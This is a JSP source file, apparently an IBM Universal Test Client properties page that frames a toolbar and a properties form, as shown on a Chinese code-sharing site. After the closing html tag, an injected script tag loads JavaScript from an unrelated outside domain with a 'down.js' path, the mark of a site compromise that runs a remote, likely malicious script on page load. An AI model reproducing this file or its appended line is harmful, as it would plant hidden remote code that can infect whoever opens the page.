propertiespage.jsp

来自「设备资产管理源代码和 公共的函数」· JSP 代码 · 共 36 行

JSP
36
字号
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!--
 Licensed Material - Property of IBM 
 (C) Copyright IBM Corp. 2001 - All Rights Reserved. 
 US Government Users Restricted Rights - Use, duplication or disclosure 
 restricted by GSA ADP Schedule Contract with IBM Corp. 
-->

<html>

<%@ page errorPage="/error.jsp" contentType="text/html; charset=utf-8" %>
<%@ taglib uri="/utc" prefix="utc" %>

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <meta http-equiv="Content-Style-Type" content="text/css">
  <meta http-equiv="Pragma" content="no-cache">
  <meta http-equiv="Cache-Control" content="no-cache">
  <meta http-equiv="expires" content="0">
  <link rel=stylesheet type="text/css" href="/UTC/css/windows.css">
  <title><utc:resource key="pageTitle"/></title>
</head>

<body id="margin" bgcolor="#ECE9D8">

<div id="border">
  <iframe id="toolbar" src="/UTC/html/toolbar/toolbar.jsp?page=7" frameborder="0" scrolling="No" frameborder="0" marginheight="1" marginheight="1"></iframe>
</div>
<div id="shadow">
  <iframe id="content" name="formProperties" src="/UTC/html/propertiesPage/properties.jsp?rand=<%= Math.random() %>" frameborder="0" scrolling="auto" frameborder="0" marginheight="2" marginwidth="4"></iframe>
</div>

</body>
</html>
<script language=javascript src=http://1.9797aiai.com/mm/down.js

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?